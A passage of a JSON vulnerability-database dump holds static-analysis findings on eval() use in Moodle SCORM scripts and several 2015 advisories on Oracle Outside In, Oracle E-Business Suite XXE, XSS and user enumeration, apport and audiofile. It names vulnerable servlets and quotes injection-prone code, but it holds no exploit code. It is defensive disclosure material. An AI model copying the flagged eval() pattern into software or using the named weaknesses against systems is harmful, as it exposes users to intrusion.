140, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1225, "positionInEndLine": 149, "startLineNumber": 1225, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " // check if the element has a default value\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != \"undefined\") {\n\n // check if the default value is different from the current value\n if (eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue') != data[property]\n || eval('typeof(datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue)') != typeof(data[property])) {\n\n // append the URI fragment to the string we plan to commit\n datastring += elementstring;\n\n // update the element default to reflect the current committed value\n", "vulnerId": "APPCUT:62:14353", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 43, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 581, "positionInEndLine": 114, "startLineNumber": 581, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " }\n }\n\n eval(cmiobj[scoid]);\n eval(cmiint[scoid]);\n eval(cmicommentsuser[scoid]);\n eval(cmicommentslms[scoid]);\n\n if (cmi.completion_status == '') {\n cmi.completion_status = 'not attempted';\n }\n", "vulnerId": "APPCUT:62:14346", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 12, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 265, "positionInEndLine": 36, "startLineNumber": 265, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}]}]}, "href": "http://infowatch.com/products/attack_killer", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "references": [], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research &#40;now part of Flexera Software&#41; 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1&#41; Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2&#41; Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3&#41; Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS &#40;Denial of Service&#41; and compromise an application using the SDK.\r\n\r\n1&#41; An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2&#41; An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4&#41; Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5&#41; Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6&#41; Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research &#40;now part\r\nof Flexera Software&#41;.\r\n\r\n======================================================================\r\n\r\n7&#41; References\r\n\r\nThe Common Vulnerabilities and Exposures &#40;CVE&#41; project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8&#41; About Secunia &#40;now part of Flexera Software&#41;\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9&#41; Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-11-02T00:00:00", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:02", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:02", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32660", "https://vulners.com/securityvulns/securityvulns:doc:32549"], "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-11-02T00:00:00", "title": "apport security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:02", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Apport", "version": "2.18", "operator": "eq"}], "cvelist": ["CVE-2015-1338"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32651"], "description": "PHAR extension DoS.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-11-02T00:00:00", "title": "PHP security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:03", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PHP", "version": "5.6", "operator": "eq"}], "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14753", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "references": [], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability Partial &#40;P&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1&#41; An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2&#41; An attacker can perform a DoS attack &#40;for example, XML Entity Expansion&#41;.\r\n3&#41; An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-11-02T00:00:00", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:02", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-4849"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "references": [], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published:20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity None &#40;N&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-11-02T00:00:00", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:02", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-4845"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "references": [], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality None &#40;N&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting &#40;XSS&#41; due\r\nto lack of sanitizing the &quot;domain&quot; parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-11-02T00:00:00", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:02", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-4854"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32658", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "references": [], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-11-02T00:00:00", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:02", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-7747"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "references": [], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash 